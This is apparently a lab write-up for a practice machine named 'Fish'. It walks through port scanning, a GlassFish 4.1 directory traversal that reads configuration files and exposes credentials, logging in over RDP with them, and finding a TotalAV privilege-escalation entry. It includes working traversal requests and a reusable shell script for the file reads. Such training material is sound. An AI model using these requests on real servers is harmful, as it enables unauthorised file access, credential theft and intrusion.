
# Fish

## Nmap

```
nmap 192.168.213.168 -sS -sV -p- -Pn

PORT     STATE SERVICE              VERSION
3389/tcp open  ms-wbt-server?
3700/tcp open  giop                 CORBA naming service
4848/tcp open  http                 Sun GlassFish Open Source Edition  4.1
6060/tcp open  x11?
7676/tcp open  java-message-service Java Message Service 301
7680/tcp open  pando-pub?
8080/tcp open  http                 Sun GlassFish Open Source Edition  4.1
8181/tcp open  ssl/http             Sun GlassFish Open Source Edition  4.1
8686/tcp open  sun-as-jmxrmi?
```

Starting out, we use `searchsploit` to look for known vulnerabilities in the services nmap identified.

```bash
searchsploit -w "GlassFish 4.1"
```

![](/files/eh9y8d5nHQwucBiDoNY3)

The version of GlassFish in use is listed as vulnerable to directory traversal. The exploit below gives example requests that read known system files.

**ExploitDB:** <https://www.exploit-db.com/exploits/39441>

Taking one of the examples from that entry and substituting the target IP and the admin port (4848), we can build a `curl` GET request to confirm the directory traversal. The `%c0%af` sequences are an overlong two-byte UTF-8 encoding of `/` (byte 0x2F): the server decodes them back into path separators, while a filter that looks for the literal `../` never matches.

```bash
curl http://<IP>:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini 
```

![](/files/kjU9j6ab2X4bRVOlRjFO)

With the traversal confirmed, the next step was to look up GlassFish's configuration files for anything holding credentials. This StackOverflow [link](https://stackoverflow.com/questions/41078683/how-do-i-reset-the-forgotten-password-of-glassfish-server-4) proved informative, and with a little guesswork on the install path I was able to read the admin hash from the domain's `admin-keyfile`.

```bash
curl http://<IP>:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../glassfish4/glassfish/domains/domain1/config/admin-keyfile
```

![](/files/WN3u9KWcbdRLxE3YtWge)

Unfortunately, however, I was unable to crack the hash, so this path leads nowhere for now.

Looking through the rest of the open ports manually, we come across a page for "SynaMan", which reports its version as 4.0.

![](/files/GEdDg27aLcV7KMhvLFPN)

Again, `searchsploit` tells us whether the running version has a known issue.

```bash
searchsploit -w "SynaMan 4.0"
```

![](/files/QAbAJMsokMnUWWsMfpwW)

The `SMTP` credentials disclosure entry is the interesting one:

**ExploitDB:** <https://www.exploit-db.com/exploits/45387>

![](/files/uInHKADNRT8hucFFi34C)

From the description, the data we want lives in `AppConfig.xml`, and since we already have a directory traversal read on this host we can likely pull that file directly:

```bash
curl http://<IP>:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../SynaMan/config/AppConfig.xml   
```

![](/files/0Z7Q09A34fY8sMTvG7HW)

From the output we can piece together the following credentials:

```
arthur:KingOfAtlantis
```
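The three traversal reads above (`win.ini`, the GlassFish `admin-keyfile` and SynaMan's `AppConfig.xml`) differ only in the target path, so the request building is worth pulling into one small script. This is an added example, not code from the original writeup or from the exploit entry: the base path `/theme/META-INF/prototype` and port 4848 are the ones used on this page, the depth of 12 matches the working request above, and the `looks_like_winini` check and its sample input are constructed here.

```shell
#!/bin/sh
# Added example (not part of the original writeup): reusable reader for the
# GlassFish 4.1 path traversal used on this page. Assumes the vulnerable base
# path /theme/META-INF/prototype on the admin listener (port 4848).

# Overlong two-byte UTF-8 encoding of '/' (0x2F). A lenient decoder maps
# C0 AF back to '/', but a filter looking for the literal "../" never sees it.
OVERLONG_SLASH='%c0%af'

# Print the request path: base + DEPTH copies of "%c0%af.." + "%c0%af" + TARGET.
# Pure string building, no network, so it can be checked offline.
gf_traversal_path() {
  depth="$1"
  target="$2"
  path='/theme/META-INF/prototype'
  i=0
  while [ "$i" -lt "$depth" ]; do
    path="${path}${OVERLONG_SLASH}.."
    i=$((i + 1))
  done
  printf '%s%s%s\n' "$path" "$OVERLONG_SLASH" "$target"
}

# Fetch one file through the traversal. --path-as-is keeps curl from
# normalising dot segments itself; harmless with the encoded separators used
# here, but required if you ever try a plain "../" variant.
gf_read() {
  host="$1"
  port="$2"
  depth="$3"
  target="$4"
  curl -s --path-as-is "http://${host}:${port}$(gf_traversal_path "$depth" "$target")"
}

# Confirm the traversal actually landed on win.ini rather than an error page:
# a real win.ini carries the "[fonts]" section header. Returns 0 on a match.
looks_like_winini() {
  printf '%s\n' "$1" | grep -q '^\[fonts\]'
}

# Usage against the host from the writeup (12 levels up, as in the page):
#   gf_read 192.168.213.168 4848 12 windows/win.ini
#   gf_read 192.168.213.168 4848 12 glassfish4/glassfish/domains/domain1/config/admin-keyfile
#   gf_read 192.168.213.168 4848 12 SynaMan/config/AppConfig.xml
```

Running `gf_read` with the first target and piping the result through `looks_like_winini` gives a yes/no confirmation of the traversal before you start guessing at credential files; the other two targets are the exact files read above.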

Since `RDP` is open, a quick check with `Hydra` confirms the credentials are valid.

```bash
hydra -l "arthur" -p "KingOfAtlantis" rdp://<IP> 
```

![](/files/cGra9NtjLQARVYNNwBbR)

We can then connect to the target over `RDP`.

```bash
xfreerdp /u:"arthur" /p:"KingOfAtlantis" +clipboard /v:<IP>
```

![](/files/RHOgcSC7R1QJb0Yew97n)

On the desktop there is a shortcut for the AV application `TotalAV`. Checking `appwiz.cpl` (Programs and Features), the installed version is *4.14.31*.

![](/files/9Pbvv3OfZ3brxe75A8q4)

`searchsploit` again shows an entry matching the installed version.

```bash
searchsploit -w "TotalAV 4.14.31"
```

![](/files/GAEJQ27JeSXv7gowoG03)

This version of `TotalAV` is listed as vulnerable to local privilege escalation.

**ExploitDB:** <https://www.exploit-db.com/exploits/47897>

**Youtube:** <https://www.youtube.com/watch?v=88qeaLq98Gc>
